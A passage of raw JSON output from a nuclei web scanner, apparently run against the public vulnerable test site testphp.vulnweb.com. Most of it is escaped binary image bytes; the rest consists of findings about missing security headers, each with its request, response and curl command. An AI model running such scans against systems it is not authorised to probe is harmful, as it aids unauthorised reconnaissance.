ufffd\\u001c\\ufffdގ\\ufffd9\\ufffd?\\ufffd\\ufffdU\\u0010\\ufffd)\\ufffd\\ufffd\\ufffd:\\ufffd\\u0003+P\\u0004\\ufffd\\ufffdaF\\ufffdX\\ufffd\\u003c\\u001b≩\\ufffd\\ufffd0A\\ufffd\\ufffd\\u0003\\ufffd\\ufffdX]O!\\ufffd\\u001a\\u0003\\ufffd\\ufffd\\ufffdA\\ufffdH\\ufffd\\ufffd\\ufffd\\ufffd6\\ufffd\\ufffd\\ufffd{\\u001f\\ufffdT6\\ufffdǬgvl\\ufffd\\u001e\\ufffd[\\ufffd\\ufffd\\ufffdX\\u001c\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\u0007=\\ufffd\\ufffd\\ufffdo\\ufffdM\\ufffd\\ufffd/}f\\ufffd\\ufffd\\ufffd\\ufffdW\\ufffd\\u0008n\\ufffd\\ufffd8\\ufffd\\ufffd\\ufffd\\u0016\\\"I\\ufffd/A\\u001b\\u0005\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffduy\\\"\\u0000R\\ufffdŀ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\u001cԺ\\ufffdt\\ufffd\\ufffd\\ufffd,\\u0000孨\\u0011\\ufffdP\\ufffdA\\ufffd\\r\\ufffd\\ufffd\\u001a+3;ч\\ufffd\\ufffdF;T{\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffdV\\ufffd6\\ufffduL\\ufffd\\ufffde\\ufffd\\ufffd\\nۈ,YX\\ufffd\\ufffd\\ufffd?\\ufffd\\ufffdN:.*b@\\ufffd\\ufffd\\ufffd\\ufffdQ5}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0007Ցi\\ufffd\\ufffd}\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n;\\ufffd\\ufffdד\\ufffdh\\ufffd\\ufffd/\\ufffdӁ\\ufffd\\ufffd\\ufffd9hw\\u001f[\\ufffd\\ufffd\\ufffd\\\\\\\\92_w\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0018\\ufffd\\u000b\\ufffd\\ufffd\\u001f\\ufffd'\\ufffd\\ufffdw3\\ufffd\\ufffd8\\u0001Yop\\u0006ڂ\\ufffdl\\ufffd+C\\ufffd\\ufffd\\ufffd:\\ufffd\\ufffdr\\ufffdt`zLV\\ufffdA\\ufffd|\\u001f\\ufffd\\u0003\\ufffd\\ufffd\\u0002;\\u0017\\ufffdD\\ufffdmm\\ufffd\\ufffd\\ufffd\\u000c̾\\ufffd\\ufffd\\ufffd@\\ufffdB7)\\ufffd\\ufffd2\\ufffdH\\ufffd\\ufffdǛ\\ufffd\\\\\\u0011VF\\ufffd};\\ufffd'\\ufffd\\ufffdL*@ۈV4O\\ufffdߑu\\ufffd\\ufffdp1\\ufffd\\ufffdُ\\u0018E\\ufffdhw\\u003e\\ufffd\\ufffd?]\\u003c\\ufffd\\ufffd\\u001fM\\u0010\\ufffdL\\ufffdf\\ufffdSa\\u000cƌ\\n\\u0000}t|_\\ufffd\\ufffd\\ufffd15\\u0000F\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\u0015\\u000fSD\\u001d^\\ufffd\\\\\\ufffd\\ufffd\\t(\\u001cX\\ufffdj\\ufffd:\\ufffd:\\ufffd\\u000c\\ufffd\\u0018\\ufffdy\\u0007]\\ufffd\\u001fm#\\ufffd\\ufffd`\\ufffd\\ufffdS#*\\u0008\\ufffd@f\\u000e\\ufffd\\u0015_sΪ\\u001dy^L\\ufffd\\ufffd\\t\\ufffd1Ŵ\\ufffd\\ufffd\\ufffdk\\ufffd7|7\\u0015|}E\\ufffd\\ufffd\\ufffd#3\\ufffd#29\\ufffdr8`{Q\\ufffd΢\\u000f\\ufffd!\\ufffdF$e۸\\ufffd\\u0018Ճ\\ufffd\\ufffd\\u003cw\\u0014k\\ufffd\\ufffduFN\\u0013㱓\\r\\ufffdѰ\\ufffd\\ufffd\\u001d\\ufffd\\u0000\\ufffd·l\\ufffdU\\u0026\\ufffdr=\\ufffd\\ufffdGϿ\\ufffd\\ufffd\\ufffdͦ\\ufffd4\\ufffd:\\ufffd9\\ufffdC\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffd\\u0015Z\\u0012|\\ufffd\\\\\\ufffd$\\ufffd\\u0016b\\u0015\\u0000bI \\n\\u001c\\ufffd\\u0000\\u0000\\ufffd\\ufffd^uT\\ufffd\\ufffdf!\\ufffd\\ufffd!\\ufffdV\\ufffd\\ufffdUoɮkށ5\\ufffd\\u001e\\ufffd\\t\\ufffdW\\ufffd3(,\\ufffd~`\\ufffdF\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdk,\\ufffd\\ufffd\\ufffdo4\\ufffd\\ufffdr80\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffd7Uλ\\ufffd\\ufffd\\ufffd\\u0015\\u0001\\ufffd\\ufffd;\\ufffd\\u001et\\ufffdى\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0008\\u003eڂ^E\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd@\\u001as\\ufffd=ŘC\\ufffd\\u0001\\ufffd(\\ufffdp\\ufffd˘ϐ\\ufffd\\ufffd\\ufffd)\\ufffd\\ufffd\\\"\\ufffd\\u003c\\ufffd0\\ufffdz\\ufffd7ȡ\\ufffd\\ufffd\\ufffd\\ufffdyI\\u0004b\\ufffd\\ufffd{\\ufffd\\ufffd8c\\ufffd\\ufffds=%A\\ufffd\\u0026h\\ufffdu\\ufffd-\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\ufffdf\\ufffd\\u0011\\ufffd\\ufffd\\ufffdk\\ufffd#\\ufffd\\ufffd\\u0008\\u001d\\ufffd滊҈D\\ufffd\\ufffdz\\ufffd\\ufffd+\\ufffd\\ufffd\\ufffdO\\ufffd\\ufffdcP\\u0007a\\ufffdx\\u001fm\\u003c3Y\\ufffd\\ufffdg\\ufffd%\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"a,\\ufffd|\\ufffd\\ufffd\\ufffdk\\u001e\\u0001\\ufffdkM\\ufffd\\u0015h\\u000eݴ\\ufffd\\u0019UG}^z\\ufffd\\u0011r\\ufffd(\\u001e\\ufffdk\\ufffd\\ufffd\\ufffd\\u0014N\\u0026f\\ufffd\\ufffd\\ufffd4p\\ufffd\\ufffd\\ufffd\\ufffd`\\u003c\\ufffd\\ufffd.\\u000f\\ufffdRf\\u000b\\u001cr\\ufffd\\ufffdLE\\ufffd\\ufffd\\u0004w\\ufffda\\ufffd\\u0013;\\ufffdd\\ufffd$X\\ufffd\\u0018\\ufffdo\\ufffd($\\ufffd\\ufffd\\ufffdA\\u001e\\ufffd\\ufffd\\ufffd\\\\\\ufffd\\ufffd\\ufffdt\\ufffd\\ufffd[\\ufffd\\ufffdq'P\\ufffd\\u0014/,\\ufffd\\ufffd\\ufffd\\ufffdI\\ufffd\\u001a\\u001e_\\ufffdq\\ufffd\\ufffd#74I`E-{\\ufffd?\\ufffd\\ufffdF\\ufffd\\u0011|?\\ufffd\\ufffd\\u001eJL\\u0015\\u000c\\ufffd\\ufffd.@!d\\u0003\\ufffd\\u0006\\ufffd\\ufffd\\ufffdoO\\ufffd\\ufffdme\\ufffd\\ufffdt\\ufffd\\ufffd1\\ufffd\\ufffd\\ufffd8 \\ufffd\\u00005\\ufffd\\u003e\\ufffd\\ufffd~u\\u0001c\\ufffdB\\ufffd93\\ufffd\\ufffd\\ufffd\\ufffdpS\\u0000\\u0019\\u0008\\ufffd\\ufffd\\ufffd\\u0003nu䊢;P\\ufffd\\ufffd\\ufffd\\ufffdS'\\u0026N\\ufffd\\ufffd2\\\"\\ufffd\\ufffd\\ufffd\\u0006W\\ufffd\\ufffdG\\ufffd\\u003c\\ufffd\\ufffd\\u0011‚ǎIZ\\ufffdl?\\ufffd\\ufffd\\u000f\\u001b\\u0010\\ufffd\\u0000\\u0005YV\\ufffdc\\u000cB\\ufffd\\u0015\\ufffd\\ufffd\\u001am\\ufffdӠ\\ufffd%H\\ufffdDU\\ufffdÿ\\ufffd\\ufffd\\ufffd\\r$\\ufffddր\\ufffdD\\ufffd\\ufffdbu\\u0003\\ufffd,\\ufffd2\\u001c\\ufffd\\ufffd匨X\\ufffd\\ufffd\\ufffd!,\\ufffd\\u0018\\ufffd\\u0017d\\u0011\\\\\\ufffd\\u001ac\\ufffd\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffddIe\\ufffd(\\u001fP\\ufffdIT\\ufffdqUVŅ\\ufffd\\u003c\\u000f\\ufffd:\\ufffdE\\n\\ufffd8\\ufffdH\\ufffdx\\ufffdUm+\\ufffd\\u0006֟\\ufffd\\ufffd\\ufffdp\\ufffd_P\\ufffd'\\ufffd#\\ufffd\\ufffd\\u001a\\u0007*e\\ufffd9\\u0004r\\u0015\\u000e\\ufffd[k0\\ufffd\\ufffd}\\ufffdP~\\ufffdL\\ufffdV'\\u00042\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffdA\\ufffdv\\ufffd\\ufffdH}x\\ufffd\\ufffd\\u0013_\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0019L\\ufffdB\\ufffd\\ufffdX\\ufffd\\ufffdB\\u0014\\u0005RV@K\\u0012\\ufffdKpG\\ufffd\\u0000\\u000bDrh\\ufffd\\ufffd3ʞN\\ufffdxZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0006\\ufffd\\ufffdVyY\\ufffdo\\ufffdw\\u0010\\u0016\\ufffd\\ufffd\\u001a\\ufffd\\u0011L\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0005\\u0004\\ufffds\\ufffd\\ufffds\\ufffd\\u003e\\ufffdy\\ufffdm6\\ufffd\\ufffd\\ufffd8\\ufffd\\ufffdK0\\ufffd\\\"X\\ufffd\\ufffd[Q\\ufffd\\u0016\\u000bE\\ufffd$\\ufffd#q\\ufffdg\\ufffd\\u001ck±\\ufffdĦ\\ufffd*\\ufffdһ\\ufffd\\u000cy#m\\u000e,\\u0000\\u00007\\ufffd6\\u0001\\ufffd\\ufffd}#\\ufffd\\u001c\\ufffd\\ufffd\\ufffd,\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd6ڀ\\ufffd\\ufffd\\ufffdFGs\\ufffd\\ufffd8\\u001bZ\\ufffdZڋ\\ufffdt\\ufffd\\u0017\\ufffd,\\ufffd\\u001a\\ufffd\\ufffdz\\ufffdWj7\\ufffd\\ufffd\\ufffdUR\\ufffd\\ufffds@\\ufffd\\u000e\\u0015\\u0012\\u000c\\ufffdA\\ufffdj\\ufffd\\ufffd\\ufffd\\ufffd\\u0013,H;\\ufffd%\\n\\ufffd\\ufffd\\u0016,_o\\ufffd\\ufffd\\ufffd^\\ufffd\\ufffd]\\ufffd0\\ufffdG\\ufffd6\\ufffd\\ufffd\\u0014\\ufffdn\\ufffd\\u001d\\ufffd\\u0000:\\ufffd*_\\\\\\ufffd\\ufffd1y\\ufffd|\\ufffd\\ufffd\\u0004aM\\ufffdv\\ufffdF\\ufffdB\\ufffd_j\\ufffd\\ufffd(\\ufffd\\u0006\\ufffd\\ufffdo^\\ufffd\\ufffd\\ufffd\\\\\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd23\\u001e\\ufffde\\ufffd\\u001d\\u0013p\\u0004\\ufffd\\u0004\\ufffd\\u0007\\ufffd\\u003c\\u000f\\ufffd\\u001a\\ufffd3\\ufffd$\\u0003\\ufffd\\ufffd\\ufffd\\u0007\\ufffd\\ufffdm\\u0005\\ufffd\\u001cKF\\ufffd\\u003e羝c\\u0015\\u0015ڵ\\ufffd\\ufffd\\ufffd'\\u0013\\u001e\\ufffd\\ufffdv\\\\\\ufffd\\ufffd \\ufffd͖\\ufffd䊾\\ufffd(\\ufffd\\u003c\\ufffd\\ufffd8}\\u000e\\u0012\\ufffdg\\u0026m\\ufffd\\ufffd\\ufffd\\ufffd#\\ufffd\\ufffd\\u001f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd\\ufffd4Ǒx\\ufffdN\\u0015/]\\ufffds\\ufffd\\ufffd\\u000e\\ufffdohN/O\\ufffdy1!n9e\\ufffd\\ufffd7\\ufffd\\u0018\\ufffd(\\ufffd\\u0006\\ufffdǕ}\\ufffd\\ufffda\\u000c\\ufffd\\ufffd\\ufffd\\ufffd\\u0004\\ufffd\\ufffda\\n\\u0001㶎\\ufffd@ \\u001f\\ufffd\\ufffd\\ufffdƍ\\ufffd\\ufffd\\u0007Τ\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0010\\u0000@\\ufffd18\\ufffd\\ufffd\\u001d\\u0017\\u001bX\\u001e\\ufffdBH\\\\c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd܂4B\\u001e~\\ufffd\\\\։\\u0004\\ufffd\\ufffd?MP\\ufffd\\ufffdI\\r\\ufffd\\ufffdݹ\\ufffd\\ufffdz\\ufffd\\ufffd\\ufffdI\\ufffd wfc\\ufffd\\u0015\\u0014Y\\ufffd\\ufffd@\\u0000{\\u0001\\ufffd\\ufffd4ר.Yp\\ufffd4E\\n#\\ufffdV$|\\ufffd\\u001bo4l]\\u001e;\\ufffd\\ufffd\\ufffd̼KT2wT\\ufffd\\ufffd\\u0013\\ufffd\\u001b?1\\ufffd\\ufffd\\ufffd\\u001e\\u0007\\ufffdIuR\\u003c+7\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd!{\\u0010O\\ufffd\\u0013\\u000e\\ufffd3Y\\u0016D\\ufffdcb\\u0003\\ufffda[\\ufffd\\u0018X\\u0006\\ufffd\\ufffd\\u0001\\ufffdڹ\\u00122[a\\ufffd\\u0007\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\\\,eґAU!@\\ufffd߸\\u001c\\ufffd\\u00007ި{k\\u000f\\ufffd\\ufffd}Y\\ufffd\\ufffd\\ufffd\\ufffd٢\\ufffd\\u000c\\u0018ϰ|\\u000f\\ufffd\\ufffd_\\u000f┃\\u001f\\ufffdފ%\\rD_'r\\ufffd\\ufffd\\u0004W\\u0017ߛ\\u0000\\ufffd1\\ufffd\\u0000\\u001bu\\u0015\\ufffd̝\\ufffd(\\ufffd\\ufffd]\\ufffdT\\u0016\\ufffdl\\ufffd\\ufffdLn\\ufffd\\ufffd\\u0015Wܒöc#v8\\ufffd9m\\\\\\ufffd\\ufffd\\u001bQ\\ufffdBֈ\\ufffd]\\ufffd\\ufffd^\\ufffd9\\u0001\\ufffd.ϕ\\ufffd\\ufffd\\ufffdN\\ufffdş\\ufffd\\ufffdן\\ufffd\\ufffd\\ufffdl\\ufffd\\u0026\\ufffd\\ufffd\\ufffd\\ufffdp72\\ufffd\\ufffdܮ\\t\\u001f\\ufffdT\\ufffd\\ufffdn;\\\\M\\u0005\\u0026\\ufffder\\ufffd\\u0006\\ufffdE\\ufffdn\\ufffdQ\\u003cv\\u003cX44:\\u0002Ɖ\\ufffd{\\ufffd\\ufffdh\\ufffd@G\\ufffd\\ufffdU\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffd1\\ufffdO\\ufffdY\\ufffdu\\ufffd\\ufffd0ر\\u0016p7\\u001d\\ufffd\\ufffd\\ufffd\\u0000^O\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd^\\ufffdWƂ\\ufffd,\\ufffdN\\ufffdN\\ufffd\\ufffd\\u0000I\\ufffdL\\ufffd:\\ufffd%\\t\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdd\\t\\ufffd\\u000cL\\ufffd\\ufffd\\ufffdP\\ufffd\\u001d\\u0016\\u001c\\ufffd#\\r1eC`m\\u000bb\\ufffd\\ufffdU\\ufffd\\ufffd\\ufffdǁE\\u0026\\u0026zez\\ufffd\\ufffd\\ufffd\\u0018(P\\ufffd[\\ufffd\\u001b6\\ufffd7F\\ufffd\\ufffd\\ufffd\\ufffdp5~\\u0014\\ufffd\\ufffd\\u0001FR=\\ufffd\\ufffd|`\\rk\\ufffdT\\ufffd\\ufffde\\ufffdh\\ufffd\\u003e/\\ufffdH\\ufffd}Y\\\\\\ufffd\\ufffdqH\\ufffdG\\ufffd\\u0001~/p\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\ufffd\\u0000\\ufffd\\u001a)V4\\ufffd\\u0004J\\ufffd\\u000e\\ufffd\\ufffd\\u0018\\ufffdE\\n\\u003c\\ufffd\\ufffd^\\ufffdֆ\\u0008\\ufffd\\u0003\\ufffd\\u001d\\u000c \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd̯~O L\\ufffd?W\\ufffd\\ufffd#\\ufffdVV\\ufffdf\\ufffddJ2P;\\ufffd\\ufffd;\\ufffdU\\n\\ufffdY\\ufffd\\ufffd\\ufffd:\\ufffdx\\u001d\\u003e6\\ufffd7\\ufffd-\\ufffd\\ufffdV2ށ,F\\ufffd7\\u000f\\ufffd\\ufffdأ}\\ufffdj#\\ufffdR;\\r\\\\\\ufffd\\u003e\\u0016]\\ufffd1\\ufffdp\\u003c\\ufffd\\ufffd\\u003e\\ufffdw\\ufffd\\ufffd1\\u000c\\u001f\\u0015\\ufffd\\ufffd4%\\u0000\\ufffd\\u001e\\ufffdV(\\ufffd\\ufffd捀A\\u0006\\ufffd\\ufffd{\\ufffd\\ufffd\\ufffd\\u001f\\ufffdP\\ufffd\\u000e\\u003eT\\ufffd\\u0015\\ufffdr\\u0002:\\ufffdb\\ufffd\\u00057`\\u001e\\t\\ufffd\\ufffd\\ufffd\\ufffdӡb\\ufffd\\ufffd#GUz\\ufffd\\u000e\\ufffdh\\n\\u0003m\\ufffd\\u0001\\ufffd@d\\ufffd\\u001b\\ufffd4\\u00016\\ufffd\\ufffdx\\ufffd\\u003cJ\\u0002\\ufffdc\\ufffd)a`\\u001a\\u0026\\ufffdw\\ufffd\\ufffd\\t\\u0001\\ufffd\\ufffd\\ufffd\\ufffd~ M\\ufffdn\\ufffdu\\ufffd\\ufffd\\ufffd\\ufffd3\\ufffd{\\u001a\\u0004\\ufffd{\\ufffd\\ufffd\\ufffdLq\\ufffd\\ufffd,\\ufffd\\ufffd\\\\\\ufffd\\t\\ufffd\\ufffdSI\\ufffdS{\\u001b\\ufffdG\\ufffd\\u000f\\ufffd\\ufffd\\ufffd|;!\\ufffd\\u0010\\ufffd\\ufffd\\ufffd\\u0026r.\\ufffd*\\ufffdT[\\u000e~m\\ufffdh_\\ufffd\\ufffdF\\ufffd\\u001d\\u0003\\ufffd\\ufffdVwM\\ufffd\\ufffd9\\ufffdI\\ufffd4\\ufffd\\ufffdƕ\\u0003!\\u003cw#m\\ufffd\\ufffd}\\ufffd\\ufffd\\u0016\\u000eO\\\"@\\ufffdzϞ\\ufffd\\u003cp#3\\ufffd\\u0000\\ufffd)=\\\\\\ufffd\\tP\\ufffd\\u0000\\ufffd\\ufffd[\\ufffd\\ufffd\\ufffd0\\ufffd!\\u000c\\ufffd\\ufffd#J״\\ufffd`S\\ufffd\\u003c|\\ufffd\\ufffdW\\ufffd1\\ufffdۜ\\ufffdH\\\",h*\\ufffd:S)}\\ufffd\\ufffdu\\ufffdb\\ufffdp\\ufffd\\ufffd\\ufffd\\ufffdD#\\u0001{\\ufffd\\u001a\\ufffd\\ufffdB\\ufffd\\u0006\\ufffd;\\ufffd\\ufffd4X\\ufffd\\u000b~M\\u0002k\\ufffd\\u000e\\ufffd?O\\ufffd\\ufffd\\ufffd6@BѻF\\ufffd\\u001c:\\ufffd5`\\ufffdD\\u001a\\ufffd\\ufffd\\ufffd\\u0000m\\u0005\\ufffd\\n\\ufffdH\\ufffd\\ufffd\\u0003w\\u0002\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdbj\\\\\\ufffd\\u0007\\ufffd\\ufffdt\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdx\\ufffdZ3HСD%\\ufffd\\ufffd\\ufffd\\ufffdT\\ufffd\\u0017B\\ufffd\\u001e\\ufffd\\ufffdv\\ufffd\\ufffd\\u0002\\ufffd\\ufffd[\\ufffdB\\u003ecc\\ufffdu\\ufffdP\\ufffd|\\ufffd\\ufffd\\ufffd˃d\\ufffd\\ufffd\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\ufffd\\ufffd\\u0016@;\\u001et\\ufffd\\ufffd\\ufffdI q\\ufffd\\ufffd\\ufffd\\u001c|\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdCL\\ufffd\\ufffd1\\ufffd%@\\ufffdB\\ufffd\\ufffd\\u0008\\u0004\\ufffd5\\ufffd\\u001b\\u0017V\\u003c\\ufffd8\\ufffd\\ufffd#\\ufffdQ\\u001364\\ufffdE#Fɹ\\u0018\\ufffd\\ufffd\\ufffdk\\u000e\\u003c\\u0010H#\\ufffd$jΒޤ~\\ufffd\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffdZ\\ufffd:\\u000f\\u001d'5\\ufffd\\ufffd\\ufffd\\ufffdzs;\\ufffdӤ\\ufffd\\ufffd6\\ufffd\\r\\u0015$i\\ufffd⤠nE?q\\ufffd\\ufffd\\ufffdsK\\u0019h\\u0018\\ufffd( \\ufffd5d]_﫺fw\\ufffdL\\u0019\\u0000$\\ufffdk\\ufffd\\u0000G\\ufffd\\\\\\ufffd\\ufffdЧO\\ufffd\\ufffdm\\ufffd1\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdH\\ufffd\\ufffd\\ufffd\\n\\ufffd\\ufffdx\\u0004]\\ufffd}\\ufffd\\ufffd\\ufffd\\u003c\\ufffd\\ufffd\\ufffd$0ώ\\ufffd\\ufffd\\u0010\\ufffdB7314\\u0015Tr\\ufffd\\ufffd\\u0000\\ufffd\\ufffdc\\ufffdj\\ufffd\\ufffd\\ufffd\\u001aJ\\ufffd]A\\u0017tG\\ufffd\\u0007L\\ufffd\\ufffd\\ufffd\\ufffds\\ufffd嶰g\\ufffd8\\ufffd\\ufffdW\\u001f\\\"F\\ufffd\\\\\\t\\u0013\\ufffdS\\ufffd\\ufffd_c\\ufffd:\\ufffd\\ufffd\\ufffdGYy\\ufffd\\u0002z\\ufffd\\ufffd\\u0011;U\\ufffd\\ufffd\\ufffd\\u0001I\\ufffd\\ufffd]\\ufffdw\\ufffdگ\\ufffdd\\ufffdt\\ufffd\\ufffdXs\\u001d\\ufffdfW\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\ufffdx\\u0004X\\ufffd/\\ufffdW\\ufffd\\ufffd\\ufffd\\ufffdD\\u0005\\u0015\\ufffdC7\\ufffdU\\ufffd\\ufffd\\ufffd\\ufffdp+β]\\u001b\\ufffd\\u003cl\\ufffd}Rޒ\\u000b\\ufffdC]\\ufffd\\u0007\\ufffd\\ufffd\\ufffd\\ufffd@\\ufffdbN\\ufffd\\\"20e\\\"\\ufffd\\u0006\\ufffd\\u001a\\ufffd \\ufffd\\u0014\\ufffdT\\ufffd\\ufffd\\u0011\\ufffd\\u003e8\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd\\ufffd\\u0010N\\ufffd;\\ufffd\\u001a\\ufffdb\\u0007ƺQgV\\ufffd\\ufffd^5\\ufffde\\ufffdB\\u0004\\ufffd\\ufffdȠ\\u001e5\\ufffd\\ufffd$\\ufffdԱ\\ufffd؟I\\ufffd\\u0012\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu\\ufffd_\\ufffd\\ufffd\\ufffd\\u001d\\ufffd\\ufffd~\\ufffd\\u0018Ѫ\\ufffd\\ufffdҜh\\ufffd\\ufffd\\ufffd1\\ufffdA\\u0000\\u0013\\ufffd\\u001bA\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd/\\ufffd\\ufffd\\ufffd\\ufffd_\\ufffdU\\ufffdcV\\ufffd\\ufffd\\u0007\\ufffdm_\\ufffd\\u00188S\\ufffd@\\ufffd\\ufffd\\ufffd\\ufffdSSUn\\u001b\\ufffd\\ufffdp\\u003eOβ\\ufffd\\u0001\\ufffd\\ufffd\\ufffd3\\ufffd\\u000fU\\ufffd\\ufffd\\ufffd\\ufffd\\u0008a\\ufffd\\\\\\ufffd\\u0000\\ufffdSSV\\u003eE\\ufffdJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd,u\\u0006\\ufffd\\ufffd\\ufffd:\\ufffd\\u001cO\\u0003\\ufffd\\u00048B\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdӜef}$\\ufffd\\u0006=e\\ufffd\\tf˗\\ufffd\\ufffdZ\\ufffdm\\ufffd\\ufffd\\ufffdε\\ufffd\\ufffd\\ufffd\\u001a\\ufffd\\ufffd)\\ufffd\\u0010\\\\1a\\u0002\\u001f\\u0012\\ufffd;k\\ufffd\\ufffd\\u0018\\ufffd\\ufffd\\u0008\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdՌX\\ufffdez\\ufffd\\u0004\\u0011u\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd=F\\u0006\\ufffd,\\u001d\\ufffd\\ufffd\\u0004\\ufffd菅sr'N\\ufffd,\\ufffd10亠\\ufffdTy\\ufffdۏmMM$y\\ufffd\\u0000='[oW\\ufffd\\ufffd3W\\ufffd\\ufffdT\\ufffd\\ufffd}'\\u001f+$ \\ufffd\\ufffd$( p\\ufffd{\\ufffd5\\ufffd\\ufffd\\ufffdښ\\ufffda\\ufffdr\\ufffd\\u0026\\u0018\\ufffdͫ\\ufffd󩩮\\u000ba\\u0013\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:29.006580033Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (X11; CrOS aarch64 13597.84.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36' 'http://testphp.vulnweb.com/pictures/4.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/wvstests\",\"path\":\"/wvstests\",\"matched-at\":\"http://testphp.vulnweb.com/wvstests/\",\"request\":\"GET /wvstests HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nTransfer-Encoding: chunked\\r\\nContent-Type: text/html\\r\\nDate: Wed, 13 Nov 2024 02:42:27 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\u003chtml\\u003e\\r\\n\\u003chead\\u003e\\u003ctitle\\u003eIndex of /wvstests/\\u003c/title\\u003e\\u003c/head\\u003e\\r\\n\\u003cbody\\u003e\\r\\n\\u003ch1\\u003eIndex of /wvstests/\\u003c/h1\\u003e\\u003chr\\u003e\\u003cpre\\u003e\\u003ca href=\\\"../\\\"\\u003e../\\u003c/a\\u003e\\r\\n\\u003ca href=\\\"pmwiki_2_1_19/\\\"\\u003epmwiki_2_1_19/\\u003c/a\\u003e 08-Apr-2013 08:44 -\\r\\n\\u003c/pre\\u003e\\u003chr\\u003e\\u003c/body\\u003e\\r\\n\\u003c/html\\u003e\\r\\n\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:29.447893351Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 11_11) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4883.150 Safari/537.36' 